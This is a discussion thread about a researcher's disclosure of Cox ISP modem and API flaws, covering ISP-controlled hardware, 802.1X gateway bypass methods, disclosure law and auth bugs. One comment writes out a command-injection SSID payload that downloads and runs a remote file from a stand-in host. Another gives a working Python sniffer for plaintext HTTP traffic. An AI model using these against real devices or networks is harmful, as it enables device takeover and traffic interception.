What a great article. Very easy to follow. The best part was that instead of attacking the messenger and denying any problem, Cox seems to have acted like the very model of responsible security response in this kind of situation. I'd love to read a follow-up on what the bug was that intermittently permitted unauthorised access to the APIs. It's the kind of error that could easily be missed by superficial testing, or, depending on the reason behind the bug, might not even show up in a test environment.
What sucks about this situation is when your ISP forces you to use their modem or router. For example, I have AT&T fiber, and it does some kind of 802.1X authentication with certificates to connect to their network. If they didn't do this, I could just plug any arbitrary device into the ONT. There are/were workarounds for this, but I don't want to go through all those hoops to get online. Instead, I ended up disabling everything on the AT&T router and have my own router, which I keep up to date, plugged into it. Unbeknownst to me, the AT&T router could be hacked and I would never notice unless it adversely affected my service.
Thank god most things use HTTPS these days.
If you have the AT&T fiber with the ONT separate from the modem, it's really easy to bypass 802.1X. Plug an unmanaged switch in between the modem and the ONT; let the modem auth; disconnect the modem. You'll likely need to do that again if the ONT reboots, but at least for me, AT&T installed a UPS for the ONT, so reboot frequency should be low.
Personally, I built up a Rube Goldberg contraption of software and hardware with bypass NICs so that if my firewall was off (or rebooting), traffic would flow through their modem, and when it was on, my firewall would take the traffic and selectively forward it through from the modem. But there's really no need for that when you can just use an unmanaged switch. I can find the code if you're interested (requires FreeBSD), but you sound more sensible than that ;)
How does that bypass 802.1X? Are the 802.1X packets still responded to by the official modem? I was under the impression all packets were encrypted or signed with 802.1X, but I've never had to implement or test it, so I could be wrong.
802.1X is a login procedure for the port; once authentication succeeds, the port stays open until the link drops. There's no encryption or authentication per packet (it would be way too expensive), so if you put a switch between the ONT and the modem, when you disconnect the modem, the ONT doesn't see the link drop.
Managed switches or software ethernet bridges don't always propagate 802.1X packets, but unmanaged switches don't care.
> There's no encryption or authentication per packet (it would be way too expensive) […]
It is possible to tie together 802.1X and MACsec, and plenty of (Ethernet) chipsets can do MACsec at wire speed, even up to 400G and 800G:
* https://www.arista.com/assets/data/pdf/Datasheets/7800R3_MAC...
* https://www.juniper.net/us/en/solutions/400g-and-800g.html
I don't know the telco space well enough to know if there's a MACsec-equivalent for GPON, but given the 'only' 25G speeds involved I doubt it would be much of a challenge.
If you have a router running pfSense Plus* and at least 3 ports, Netgate actually has pretty detailed instructions for how to do the bypass with their layer 2 routing feature. It sounds a bit complicated, but I followed along exactly as it says and it just worked for me. It has been 100% reliable for almost 2 years, and I get significantly better speed (something like 10-20% vs the built-in "passthrough" mode on the gateway, IIRC). Plus I managed to cut the suspicious DNS server the gateway tries to interject out of my network.
https://docs.netgate.com/pfsense/en/latest/recipes/authbridg...
There's another method that doesn't require Plus called pfatt, but I'm not sure what the state of it is.
* Plus is the paid version, yeah I know I agree I don't like what they did with the licensing changes but that's a different story
That's a good idea, I do have an extra UPS/switch I can use for this. In the past when I was a bachelor and had more free time, I used to run my own FreeBSD server with pf and other services running in jails. Now that I am settled down, I just want to make things as idiot proof as possible in case there is an Internet issue at home and another family member needs to fix it.
The XGS-PON workaround that DannyBee mentioned looks promising though:
https://pon.wiki/guides/masquerade-as-the-att-inc-bgw320-500...
I probably could pay to upgrade my speed to 2Gbps and then downgrade it back to 1Gbps and keep the XGS-PON.
The CPE AT&T router potentially getting hacked doesn't make much difference if you have your own router between your network and the AT&T network. Even if we removed the AT&T CPE router, you'd still be connecting to a black box you don't control that could be hacked or doing any number of inspections on your traffic.
It does matter, since it lets an attacker sit between your network and the internet. If that black box is a modem, yes, it could be hacked, but (maybe luckily for me) the providers I've used don't expose many services from the modem on the public interface, so it's much more difficult to compromise. You'd either have to come from the DOCSIS network or the client network.
But remove the CPE router. Where do you think that fiber goes? To "the internet"? It's going to yet another box owned and managed by your ISP. And from there, probably yet another box owned and managed by your ISP. And then another black box maybe owned by yet another ISP, and then another black box owned by maybe yet another ISP. Each one of these could let an attacker come between your network and "the internet". You have no control over them. You don't patch them, you don't configure them, you have no say over the services running on them. If they're compromised, you likely wouldn't know.
The CPE just moves the first black box inside your home, but there's always some ISP black box you're connecting to. Even if you're a top tier network, it's not like you control every box between you and every other site you want to go to. You're going to eventually have some handoff at some peering location, and once again your traffic goes to a box you don't control just waiting for an attacker to manipulate and mess with your traffic.
The CPE also moves the first black box under foreign control to (potentially) both sides of your firewall, as most small businesses likely just use the router in that mode and have very little networking knowledge. That's significantly worse than somewhere on the outside of your firewall, because now it can snoop on pretty much everything and be used to scan the local network, which is often poorly protected because it's assumed to be secure.
Hence my first comment:
> doesn't make much difference if you have your own router between your network and the AT&T network
And in the end, those businesses with no networking knowledge will end up using their ISP's CPE modem/router/WiFi combo regardless of whether it's required. And in my experience it is not even just AT&T requiring their CPE router somewhere in the stack. I previously managed a Spectrum DOCSIS business internet connection where they also required their owned and managed gateway in the stack in order to have any static IP addresses. They wouldn't support any other configurations.
That's why I'm not an AT&T customer. Spectrum lets me bring my own hardware, and they're the only other option in my area, so Spectrum gets my business. Plain and simple. Unfortunately, not everyone has the palatable solution that I have.
Spectrum remote manages your hardware even if you bring your own modem. This nearly entirely consists of deploying firmware updates once a decade, but they can also command other things like modem reboots.
If it's your own hardware, what's stopping you from closing the port they connect to?
How do you propose blocking a port between the cable network and your modem? You'd have to build your own custom firmware that doesn't acknowledge upstream firmware update requests.
AFAIK, they can/will kick you off the network if your modem is running unverified firmware. I think this is a regulatory requirement, but don't take my word for it. They don't want anyone to have free access to the network, you could do things like spoof your MAC address to get free service. I'm sure you could also do something much more malicious like crash parts of the network.
DOCSIS?
Always put your own router in-between.
If you really care you can configure a VPN directly on the router, so nothing leaves the network unencrypted.
Like someone else mentioned, at some level you need to rely on your ISP and it is also a good idea to have a router in between anyway.
I would like to bypass the BGW320 because not only is it a large, power-hungry box, it also requires me to jump through hoops to get IPv6 working with VLANs. I need to either use multiple physical links (simulating multiple devices) or simulate that using a VRRP hack; otherwise AT&T will not give out multiple ranges at all (and will not care about what I request). Under Comcast I didn't have to do any of that; I'd just carve out smaller IPv6 ranges, as many as needed.
Fortunately, Cox isn't one of these. Any sufficiently modern DOCSIS modem, appropriate to the speed of service you subscribe to, is accepted.
Unfortunately, my praise of Cox ends there. I've been having intermittent packet loss issues for 2 years, and there doesn't appear to be a support escalation path available to me, so I can't reach anyone that will understand the data I've captured indicating certain nodes are (probably) oversubscribed.
It was mentioned by a sibling, but there are ways to connect without using one of AT&T's gateway devices. Different methods are catalogued on https://pon.wiki/
FWIW: the hoops are automated these days if you are on XGS-PON.
It's "plug in the SFP+ module, upload firmware using the web interface, enter the equipment serial number".
You can even skip step 2 depending on the SFP stick you use.
The 802.1x state is not actually verified server side. The standard says modems should not pass traffic when 802.1x is required but not done. Most do anyway or can be changed to do so. AT&T side does not verify, and always passes traffic. That is what is happening under the covers.
An open question is still: how were the attackers able to grab his HTTP traffic?
Some CPEs have a cloud Wireshark-like capability for debugging. I'm not sure if those are even on the Cox production firmware images. Usually there's a set of firmware for production and a set for test (which obviously makes it hard to test for problems in production).
I suppose Cox could do a check to see what firmware versions are out there. ISPs can auto-upgrade firmware that doesn't match a specific revision, and this was a Cox modem, so they probably have firmware for it. So if it was debug firmware, how did it get there, and how did it survive?
Also, yet another reason I don't trust (and don't use) any ISP-provided equipment. Remote administration from my ISP? No thank you.
Even if you buy your own modem they can push firmware to it (and do). The config file your modem downloads includes a cert that allows the isp to do this. You can flash special firmware (used to be called force ware) to prohibit this.
Is it safe enough to buy a separate router and put the ISP modem on the "internet" side of it?
It depends. The TR-069 managed devices are typically router/WiFi combo type devices. If you can get a dumb modem, that would likely remove any TR-069 vulnerabilities.
The firmware on whatever is doing docsis is going to be updatable by the ISP generally.
Two different mechanisms: the TR-069 management, and the SNMP-triggered firmware upgrade.
I think the attack described in the article is still possible in this setting, where the modem sits in the middle of your unencrypted HTTP traffic. This is true of any equipment belonging to the ISP.
However, I would assume no unencrypted traffic is safe anyway, and the modem would indeed not have access to your internal network.
How about putting the ISP supplied modem in a DMZ? Then the ISP could admin it all they want but still never touch the LAN.
So open it up to anyone? DMZ is an open target, not what you want to be doing.
It’s more about protecting your network against a potentially malicious device rather than protecting the device from attackers on the Internet. From that position, placing the isp device on a “DMZ” aka outside your own router/firewall, makes perfect sense.
That's pretty much the way to go. Keep the ISP modem, but connect it to your own router/firewall and connect your devices to your hardware and not the ISP modem.
I get the perspective, but I also like the fact that ISPs do take over some of the admin burden associated with running a piece of equipment like a router.
You, I, and most of the HN crowd may well be capable of maintaining a reasonably secure state on our own hardware and troubleshooting our way through common errors. However, the average internet user isn't that experienced, nor are most people interested in learning those skills.
I have a feeling the OP ... has the skills to manage his router :)
but point well taken in general.
It's HTTP, not HTTPS; anyone or anything on the wire could see the request.
That's the part I didn't get. The author said there was no other possibility except the modem, but why? It seems like quite a leap. I would have first suspected a compromised router on the internet. Is it possible that changing the modem caused new routes to be used which appeared to fix the problem?
Of all the routers along the route, the one most likely to be compromised is obviously the piece of plastic guano your ISP forces you to use
If you create a socket with PF_PACKET you can intercept all the traffic on a Linux system, on all interfaces. Think of it as a low-tech version of tcpdump.
Intercept all data on port 80, parse the HTTP headers, do whatever you need with them. Easy.
Not sure why anybody would replay the requests, though.
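A minimal sketch of what that looks like (Linux-only, needs root to actually capture; all names here are mine, and it naively assumes IPv4 with a full request in the first segment):

    import socket
    import struct

    ETH_P_ALL = 0x0003  # capture every ethertype

    def parse_http_request(payload):
        """Return (method, path, host) if the TCP payload starts an HTTP request, else None."""
        try:
            head = payload.split(b"\r\n\r\n", 1)[0].decode("ascii")
        except UnicodeDecodeError:
            return None
        lines = head.split("\r\n")
        parts = lines[0].split(" ")
        if len(parts) != 3 or not parts[2].startswith("HTTP/"):
            return None
        headers = {}
        for line in lines[1:]:
            if ": " in line:
                name, value = line.split(": ", 1)
                headers[name.lower()] = value
        return parts[0], parts[1], headers.get("host")

    def sniff():
        # AF_PACKET sees every frame on every interface (the low-tech tcpdump part)
        s = socket.socket(socket.AF_PACKET, socket.SOCK_RAW, socket.ntohs(ETH_P_ALL))
        while True:
            frame, _ = s.recvfrom(65535)
            if frame[12:14] != b"\x08\x00":      # not IPv4
                continue
            ihl = (frame[14] & 0x0F) * 4         # IP header length in bytes
            if frame[23] != 6:                   # IP protocol field: not TCP
                continue
            tcp = 14 + ihl                       # TCP header starts after Ethernet + IP
            dport = struct.unpack("!H", frame[tcp + 2:tcp + 4])[0]
            if dport != 80:                      # only plain HTTP
                continue
            data_off = tcp + (frame[tcp + 12] >> 4) * 4
            req = parse_http_request(frame[data_off:])
            if req:
                print(req)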
Holy hell. How are the laws in the US set up such that doing something like this is okay?
In Germany you would get minimum 3 years in jail for this, people got in front of court for way way way way less.
For the researcher? Because the vendor has a responsible disclosure program. Because they'd rather know about the bugs.
(As for the vendor, I'm sympathetic to the argument that there should be vendor liability under some circumstances.)
In Germany it is common for vendors to acknowledge the security flaw you send them, but if you want to publish it (and damage their reputation by doing so), they are going to take you to court, and win.
Sometimes they even take you to court if you don't publish it (yet).
To be fair, Germany is unusually harsh on security researchers. As far as I know (but German law is not my forte) there's no exclusion for "ethical hacking". I remember reading about many German cases that went like:
* A security researcher discovers that the main database of some service is publicly accessible with a default password
* They notify the company
* They get sued for unauthorized access to the company's data
This wouldn't happen in my (also European) jurisdiction, because as long as your intention is to fix the vulnerability you found, and you notify the company about the problem, you're in the clear.
That's why I would never do this kind of research from my home internet connection, and wouldn't send any responsible disclosure from my private email.
There is no reason to give any information beyond the details of the security issue...
Regarding Germany and large corporations, and somewhat of a tangent: I remember, a decade ago, a bunch of hedge funds tried to sue Porsche, the parent company of VW, for cornering the market on VW's open interest and causing the mother of all short squeezes.
They filed the case in New York, but it got thrown out for lack of jurisdiction. They did try the case in Germany, but Porsche had fittingly cornered the market for the best and biggest law firms: all of them refused to take the case, because bringing one against a German company of that size would essentially get them blacklisted by the largest companies in Germany.
It’s taken a decade, but I now see a pattern.
This seems like awful law. Is there any movement to rectify the situation?
Cox has a responsible disclosure program: https://www.cox.com/aboutus/policies/cox-security-responsibl....
In my opinion (as a security engineer) the biggest benefit of such programs is not amoral "hackers will always sell exploits to the highest bidder so companies must provide a high bounty for bugs in their software"[1] but "having a responsible disclosure process makes it totally clear that it's ok to report vulnerabilities without being sued".
Looking at the timeline below the post I can't see anything problematic. The author even waited the usual[2] 90 days before disclosure, even though the vulnerability was hotpatched a day after report (congrats to Cox btw). They also shared a draft blog post with them a month ago.
[1]They certainly should, in the ideal world.
[2]A deadline popularized (or even invented) by Google's project zero.
Yeah when a company says one of their responsible disclosure rules amounts to "just don't ruin our prod system, or reveal or steal data pls" they basically invite you to try and break in - responsibly.
> In Germany you would get minimum 3 years in jail for this, people got in front of court for way way way way less.
Great way to make sure researchers don't notify the victim of vulnerabilities, but rather stay quiet or sell it.
You'll note they never tried to change anything but their own equipment; doing otherwise would have been immoral and, yes, likely illegal. Without testing you have no idea whether or not you're actually looking at something that needs to be reported.
Germany is an outlier, not the norm, when it comes to security research
You should advocate for laws that enable security research.
I'm really glad that I can use my own modem. In Germany, every ISP is required by law to accept customer-owned modems. They can't force you to use their often shitty hardware. My current modem/router has been up for 3 months without a single interruption to my connection.
Can the ISP load firmware onto your modem? I'm on Cox in the US (same ISP as in TFA) and you can bring your own modem, but Cox will remotely update the firmware.
Not really as far as I know. Providers in Germany have more or less standardized on Fritz!Box from AVM and the router comes with the admin password available. Updates are then fetched from upstream AVM.
But the key point here is device independence - by law, providers need to give you all information required to establish a connection to them. This allows you to run a Linux or BSD box as a router should you wish to. It somehow makes up for the slow broadband speeds* you can get.
*Edit: complaints about slow broadband speeds
Are there Linux or BSD boxes with ADSL or DOCSIS physical layers present? I use a separate modem and router, as do most people in the US that are not renting equipment from their ISP.
No, they can't. They don't have any access at all to your device. But as jeduardo already said, you can fetch updates from the device manufacturer. The mentioned Fritz!Box from AVM has automatic updates and is known for delivering them for a really long time. My 12 year old repeater from that brand is still receiving security updates from time to time.
I've noticed it gets quite murky when dealing with fibre-to-the-premises, particularly in the UK. Although I don't think an ISP would disallow BYOD, I imagine they'd just not be as likely to support it.
I recently moved ISP, partly because of cost, but also because they offered a great home router as part of their bundle. The installer couldn't utilise any of the existing wiring in my house; it all had to be drilled a second time...
Conversely, my last ISP used some awful Nokia modem that barely supported any kind of routing or customisation and I picked them specifically because it was a rental and the fibre wiring had already been done.
It's fairly common for ISPs in Australia to also give you a choice of BYOD or buying one of theirs. Usually you pay outright for the modem, however, so it's yours to keep. That said, this is changing with the national fibre roll-out. But with ADSL being the de-facto choice, BYOD makes sense.
With the Aussie NBN most providers use PPPoE or DHCP, which allows BYOD or an ISP router.
FWIW, you can use your own modem and router with Cox internet, but most people don't because the provided modem is free and most people don't care to spend money on their own.
Cox can (and does) push firmware to bring-your-own modems, though.
What sort of authentication system just lets calls through randomly sometimes... The incompetence!
Discovered this in a vendor's API. They registered the current-user provider as a singleton rather than per-request. So periodically you could ride on the coat-tails of an authenticated user.
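A toy model of that singleton mistake (all names illustrative; the point is the shared slot surviving across requests):

    # Per-request state stored on a singleton: the value set by one request
    # is still there when the next, unauthenticated request arrives.
    class CurrentUserProvider:
        def __init__(self):
            self.token = None  # one slot shared by ALL requests -- the bug

    provider = CurrentUserProvider()  # registered as a singleton, not per-request

    def handle(request):
        if "token" in request:
            provider.token = request["token"]  # stale value survives into later requests
        if provider.token is None:
            return 401
        return "data for " + provider.token

With a per-request provider, the third call below would be rejected; with the singleton, the anonymous caller rides the previous user's session.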
This is ridiculously easy to do inside scripting languages like javascript
function foo(token: string) {}
function bar(token: string) {}
function baz(token: string) {}
// hmm, this is annoying
let token;
.get((req) => { token = req.data.headers.token }
function foo() {}
It is even possible to do it by "accident" with only subtly more complicated code! I constantly see secrets leak to the frontend because a company is bundling their backend and frontend together and using their frontend as a proxy. This lack of separation of concerns leads to a very easy exploit:
If I'm using, say, Next.js, and I want access to the request throughout the frontend, I should use context. Next even provides this context for you (though honestly even this is really really scary), but before my code was isomorphic I could just assign it to a variable and access that.
Regarding the scariness of the Next-provided global context: at least Node now has AsyncLocalStorage, which properly manages scoping, but plenty of legacy...
The entire ecosystem is awful.
Out of my distrust of bundlers, I'm now fuzzing within CI for auth issues: hitting the server 10k times as fast as possible as two different users and ensuring there is no mixup, and scanning the client bundle for secrets. I haven't had an issue yet, but I've watched these things happen regularly, and I know this sort of test is not common.
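The shape of that CI check can be sketched like this (the server call here is a pure stand-in; a real test would hit the live service with each user's credentials):

    import concurrent.futures

    def fake_server(user):
        # stand-in for the real HTTP call made as `user`
        return "data for " + user

    def check_no_mixup(requests_per_user=10_000):
        # fire interleaved requests for two users concurrently and verify every
        # response carries the identity of the user who made the request
        with concurrent.futures.ThreadPoolExecutor(max_workers=8) as pool:
            futures = [(user, pool.submit(fake_server, user))
                       for _ in range(requests_per_user)
                       for user in ("alice", "bob")]
            return all(f.result() == "data for " + user for user, f in futures)

Against a server with the singleton bug above, this kind of hammering is exactly what surfaces the intermittent cross-user leaks.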
I once saw a bug in a Django app which caused similar issues. Basically, the app often returned an HTTP 204 No Content for successful AJAX calls. So someone had DRYed that up by having a global NoContentResponse in the file. The problem was that at some point the Django middleware affixed the user's session token to the response, effectively logging everyone from that point on in as another user.
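The DRYed-global-response pattern boils down to this (plain classes standing in for Django's; names are illustrative):

    # One shared, mutable response object reused for every successful call.
    class Response:
        def __init__(self, status):
            self.status = status
            self.cookies = {}

    NO_CONTENT = Response(204)  # the "DRY" global -- and the bug

    def ajax_view(request):
        return NO_CONTENT  # every caller gets the same object

    def session_middleware(request, response):
        # the middleware affixes the current user's session token to the response
        response.cookies["sessionid"] = request["session"]
        return response

Because the middleware mutates the shared object, the next caller's 204 still carries the previous user's session cookie.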
In my experience this can be caused by a load balancer, for example one not being able to route (properly) to servers in the pool, or a difference in configuration/patch-level between them.
It could also be that a subset of the origin servers the requests were being routed to was misconfigured.
The API was reverse proxied. Possibly a caching issue?
Found a similar bug once. The API would correctly reject unauthenticated requests for exactly 10 minutes. Then, for exactly 1 minute, unauthenticated requests were allowed. The cycle repeated indefinitely. Would love to know what was going on in the backend...
One of the reasons not to be excited about ISP-provided cable modems with WiFi functionality, and to have good endpoint/service security on your LAN (at minimum TLS, and DNS over TLS, across the modem/ISP).
I just put it in bridge mode, disable wifi, and all network functionality is served by my own devices.
The last modem I rented from ISP, the ISP didn't bother with any firmware updates for ~10 years. It was rock stable because of that, though. :)
Routers are the most exploited IoT devices on the planet; vulnerabilities in router firmware often persist for years without getting patched, because most end users don't patch their routers. The ISP having a way to push patches onto routers and recall unpatchable ones (because they own them) is a net gain for cybersecurity.
But ISPs DON'T patch routers. Plenty of Spectrum modems still run decade-old firmware.
Yes, I agree that routers are key and critical.
Otherwise I would not be managing my own high-quality one, based on the latest Linux kernel, with standard, well-supported and maintained software and carefully selected WiFi hardware with active manufacturer support.
I also would not be trying to isolate and disable most of the ISP-provided HW/FW mess if I believed otherwise. I don't trust an ISP that didn't upgrade its modem in 10 years one bit with the security of the key entry point to my home network.
> I just put it in bridge mode, disable wifi, and all network functionality is served by my own devices.
Same. Somehow I got them to install a simple modem, one without all of the router and access point features. I thought those single purpose devices didn't exist anymore.
Bought a relatively good router, installed OpenWRT on it then bridged it to the ISP's network via their equipment. It's working well. I even have HTTPS in my LAN now.
One interesting thing I found was that the newer Vodafone cable modem with 4 ethernet ports, after switching to bridge mode, assigns public IPv4 address to at most 1 network node connected to each wired port. So it's possible to get 4 stable public IPv4 addresses assigned to my home network and use them for whatever.
It's not a great idea to host services (especially ones that can be used to identify you) on the home IP address you browse the internet with, and this is one way to get one IP address for browsing the net and a different one for serving services from home, pretty much for free.
Counterpoint: an ISP with over 1M customers has the incentive to upgrade their HGW "forever" to reduce capex. My employer (Free, a French ISP also shipping HGWs to Italy as Iliad) still upgrades the HGW it released in 2011 (though if yours dates back to 2011, have it replaced (your OLED screen is probably dead ;) to get more recent WiFi cards). It runs a modern Linux 6.4. You get modern niceties like airtime QoS, upgraded mobile apps if you wish, and lots of software features.
Why do y’all think the attacker was replaying all of his requests? Could they be probing for unintentionally exposed endpoints themselves?
If it was a request to a bank, say, it could have included all the cookies and tokens that would allow the request to go through successfully, and the attacker would gain access to their bank page (though if it was something super high security, you'd hope it would have single use tokens and stuff)
A request to a bank that doesn't use TLS would be near-criminal negligence (by the bank) in itself.
If the request does use TLS, then even a compromised router should be unable to decrypt it. TLS is end-to-end encryption.
If the request doesn't use TLS, then the compromised router can already see the request and response that it is relaying. So why does it have to replay the request from somewhere else? It can just exfiltrate the session back to the attacker silently, without replaying it first.
==
If I had to guess, the attacker isn't sure what they're looking for in the HTTP sessions, so they can't push a detection for interesting sessions down to the compromised routers, and they also don't have the bandwidth to simply receive all unencrypted traffic from their router botnet, so instead they're collecting the URLs and building up a list of detection patterns over time through scanning and using heuristics for which requests are worth investigating, something like that?
That's a good guess.
Test systems often don't use HTTPS. Test systems often have credentials that work in production (even though they shouldn't), or are useful for finding vulnerabilities in production.
If they didn't have RCE but could push config to the router, they might have pushed a syslog destination and then mined the logs. URLs for unencrypted HTTP requests could end up in the logs due to ALG, parental filtering or any number of other features. If you replayed such URLs from a large enough set of victims over a long enough period, you'd find something valuable in a response sooner or later.
Along with the other stated reasons, it could be an attempt to cloak the IP as a normal residential IP by mirroring someone else's traffic
The intermittent auth thing in /profilesearch is a sign that they're round-robinning the servers and misconfigured one.
Also, it looks like he hit a front-end API that drives the TR-069 backend. Changing the WiFi SSID is a long way from being able to "...execute commands on the device"
Is changing the WiFi SSID not executing a command on the device? It isn't _arbitrary_ commands (yet), but it's definitely executing _a_ command.
That's not the kind of vulnerability that would have installed an exploit on their CPE.
Maybe, maybe not.
If the CPE is sufficiently poorly designed, it might be vulnerable to command injection attacks, so by changing the WiFi SSID to something like "'; wget http://bla/payload -O /tmp/bla; chmod +x /tmp/bla; /tmp/bla; #" you could execute a command on the device.
Alcatel's HH40V and HH41V, as well as ZTE's MF283+ LTE modems, are recent examples I can remember where I got root SSH access by injecting commands from the admin web UI.
It's impossible to say without knowing what commands were available.
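The vulnerable pattern is usually just naive string interpolation into a shell command. A sketch (the `set_ssid` command name is made up; `shlex.quote` is the standard fix on the Python side):

    import shlex

    def build_ssid_command(ssid):
        # BAD: naive interpolation -- a single quote inside the SSID closes the
        # quoted argument, and the rest of the SSID runs as new shell commands
        return "set_ssid '%s'" % ssid

    def build_ssid_command_safe(ssid):
        # shlex.quote turns the SSID into one inert shell word, whatever it contains
        return "set_ssid %s" % shlex.quote(ssid)

With the safe version, the payload from the comment above survives only as a literal string; the shell never sees a command separator.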
This series of vulnerabilities demonstrated a way in which a fully external attacker with no prerequisites could've executed commands and modified the settings of millions of modems, accessed any business customer's PII, and gained essentially the same permissions of an ISP support team.
But the author agrees that this wasn't the vulnerability that allowed access to their own modem:
> After reporting the vulnerability to Cox, they investigated if the specific vector had ever been maliciously exploited in the past and found no history of abuse (the service I found the vulnerabilities in had gone live in 2023, while my device had been compromised in 2021). They had also informed me that they had no affiliation with the DigitalOcean IP address, meaning that the device had definitely been hacked, just not using the method disclosed in this blog post.
Being able to change the SSIDs for thousands or millions of customers remotely within a few hours would definitely be written about as an “outage” for Cox though.
Did they *pay* him? He kind of saved them, tipped them off to a complete compromise of their security infrastructure that was not trivial to discover. Looks like he got nothing in return for "doing the right thing". How insulting is that? What is their perception of someone walking into their offices with this essential information? I guarantee his self-image and their perception are very different. They see an overly caffeinated, attention-seeking "nerd" who just handed them a 300k exploit in exchange for a gold star, and then they ran like smeg to cover their asses and take all the credit internally. He feels like Superman, goes home to his basement apartment, microwaves some noodles and writes a blog post. This is a perfect example of why you never, never report a 0day.
It's Cox; he's probably lucky if they don't sue him for fixing their mistake.
It happens. This is the type of revelation where heads roll and a scapegoat is very useful for the CSO, general liability of the company and PR.
Sam is a very famous security researcher, so I would be shocked if he wasn’t making upwards of $350,000 a year. These articles he writes make him a significant amount of money via reputation boost.
Cox don't pay bounties.
> After reporting the vulnerability to Cox, they investigated if the specific vector had ever been maliciously exploited in the past and found no history of abuse
Would you trust a thing they say? It seems their whole network is swiss cheese.
This is why everything gets logged to an S3 bucket under an AWS account that has only write permissions, and three people are required to break into the account that can do anything else with that bucket. I don't know if that's what Cox has, but that's how I'd architect it to be able to claim there's no history of abuse.
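As a sketch of the write-only setup described above (the account ID, role name, and bucket name are all hypothetical, and this is one possible policy shape, not Cox's actual architecture):

```python
import json

# Hypothetical write-only audit-log bucket policy: log producers may append
# objects, but nobody in normal operation can read, modify, or delete them.
AUDIT_BUCKET = "arn:aws:s3:::example-audit-logs"

policy = {
    "Version": "2012-10-17",
    "Statement": [
        {
            # Log producers may only create new objects (append-only).
            "Sid": "AllowAppendOnly",
            "Effect": "Allow",
            "Principal": {"AWS": "arn:aws:iam::123456789012:role/log-writer"},
            "Action": "s3:PutObject",
            "Resource": f"{AUDIT_BUCKET}/*",
        },
        {
            # Deny destructive and read actions to everyone; breaking glass
            # would mean changing this policy itself, so the "three people"
            # control lives in who is allowed to call PutBucketPolicy.
            "Sid": "DenyTampering",
            "Effect": "Deny",
            "Principal": "*",
            "Action": ["s3:DeleteObject", "s3:PutObjectAcl", "s3:GetObject"],
            "Resource": f"{AUDIT_BUCKET}/*",
        },
    ],
}

print(json.dumps(policy, indent=2))
```

With something like this in place, "we found no history of abuse" is a claim you can actually back up, because attackers who compromise the production account still can't rewrite the trail.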
That's how it should be architected, but the article shows that Cox's network gives no thought to security so it's unlikely how it is architected. Even if the Cox answer is correct to the best of their knowledge, we can't rule out that attackers are inside the network wiping out their logs.
You’re right, except I’d say that Cox gave some thought to security, but not enough. Which is in some ways even more dangerous than ignoring security entirely.
Great read, and fantastic investigation. Also nice to see a story of some big corp not going nuclear on a security researcher.
I can't say for certain - and OP, if you're here, I'd love for you to validate this - but I'm not convinced requests to the local admin interface on these Nokia routers are properly authenticated. I suspect this because I was recently provisioned with one and found there were certain settings I could not change as a regular admin, and I was refused the super admin account by the ISP. Turns out you could just use the browser inspector to re-enable the disabled fields and change them yourself, and the API would happily accept the changes.
If this is the case, and an application can be running inside your network, it wouldn't be hard to compromise the router that way, but it seems awfully specific!
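The failure mode being described is client-side-only enforcement: the UI greys out a field, but nothing server-side checks the caller's role. A minimal sketch (endpoint and field names are made up, not the actual Nokia firmware):

```python
# Hypothetical router settings endpoint. The web UI disables "wan_config"
# for regular admins, but the server applies whatever keys it receives.
PROTECTED_KEYS = {"wan_config", "super_admin_password"}

def apply_settings_broken(user_role, settings):
    # BUG: trusts the UI to have filtered out protected fields.
    return dict(settings)

def apply_settings_fixed(user_role, settings):
    # Server-side enforcement: strip protected keys for non-super users.
    if user_role != "superadmin":
        settings = {k: v for k, v in settings.items() if k not in PROTECTED_KEYS}
    return settings

payload = {"ssid": "home", "wan_config": "attacker-controlled"}
print(apply_settings_broken("admin", payload))  # protected key accepted
print(apply_settings_fixed("admin", payload))   # {'ssid': 'home'}
```

Anything a browser inspector can "un-disable" was never a security boundary; only the server-side check is.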
Cox is the largest private broadband provider in the United States, the third-largest cable television provider, and the seventh largest telephone carrier in the country. They have millions of customers and are the most popular ISP in 10 states.
That suggested to me that we shouldn't have ISPs that are this big. Cox is clearly a juicy target and a single vulnerability compromises, as an example from the article, even FBI field offices.
> After reporting the vulnerability to Cox, they investigated if the specific vector had ever been maliciously exploited in the past and found no history of abuse
Feel like author should have written "...they claimed to have investigated...".
I think the author wrote it up factually. Readers can make their own inferences, but Cox did share with him that the service he exploited was only introduced in 2023. Which suggests the security team did do some investigating.
I'm sure* they don't keep raw request logs around for 3+ years. I know what next steps I'd recommend, but even if they undertook those, they're not sharing that in the ticket.
(just based on industry experience; no insider knowledge.)
The point is the statement may or may not be accurate. From a journalistic perspective, unless Cox provided evidence or the author was able to otherwise independently verify the claim, it's a claim, not a fact. The comment is a good suggestion.
> "...and found no history of abuse..."
Because they didn't have enough logging or auditing to start with, or no logs or audit data left since the hack.
From what I can gather from the post, the specific attack vector of "retry unauthorized requests until they are" is very easy to spot in logs. So even the most basic log policy that records the path, IP, and status code is enough (i.e. the default in most web servers and frameworks).
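The signature is simple enough to scan for. A toy sketch (log format and thresholds are made up for illustration): a burst of 401/403s on one path from one IP, followed by a 200 from the same IP on the same path, is exactly the "retry until authorized" pattern.

```python
from collections import defaultdict

def find_retry_abuse(entries, min_failures=5):
    """Flag (ip, path) pairs where many auth failures precede a success."""
    failures = defaultdict(int)
    suspicious = []
    for ip, path, status in entries:
        key = (ip, path)
        if status in (401, 403):
            failures[key] += 1
        elif status == 200:
            if failures[key] >= min_failures:
                suspicious.append(key)
            failures[key] = 0  # reset after a success
    return suspicious

# Eight denied attempts, then the request finally "sticks".
log = [("198.51.100.7", "/api/device/reset", 403)] * 8 + [
    ("198.51.100.7", "/api/device/reset", 200)
]
print(find_retry_abuse(log))  # the repeated-403-then-200 pattern stands out
```

Of course this only tells you anything if the logs from the relevant period still exist and were never writable by the attacker.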
«Absence of evidence is not evidence of absence», seems to apply here.
Or they lied.
I mean, if you think about it from Cox's point of view — why would you disclose to someone outside the company if there had been history of abuse? Why would you disclose anything at all in fact?
page is now 404 :-/
Not from here?
Seems to have been a temporary hiccup, as I have no trouble accessing it.
It's easy to hate on big companies. But can we just applaud Cox for having patched this within a day? That's incredible.
To be honest I would be very surprised if this was Cox as an organization and not just one or two very passionate workers who understood the severity of the issue and stayed after hours fixing it for free.
Seems more like a configuration error. Load balancer balancing over a few hosts, one of them misconfigured. Most likely over 2 hosts, given the 50/50 success ratio of the intruder test. If that’s the case then it’s easy to fix in such a timeframe.
Great writeup. There's just one thing I don't get: the auth part. It seems the author managed to access protected endpoints without any auth, by just repeating the same request over and over until the endpoint randomly accepted it. The part that confuses me is, how could that possibly happen? What possible architecture could this system have to enable this specific failure mode?
I struggle to think of anything, short of auth handling being a separate service injected between a load balancer and the API servers, and someone somehow forgot to include that in autoscaling config; but surely this is not how you do things, is it?
> how could that possibly happen?
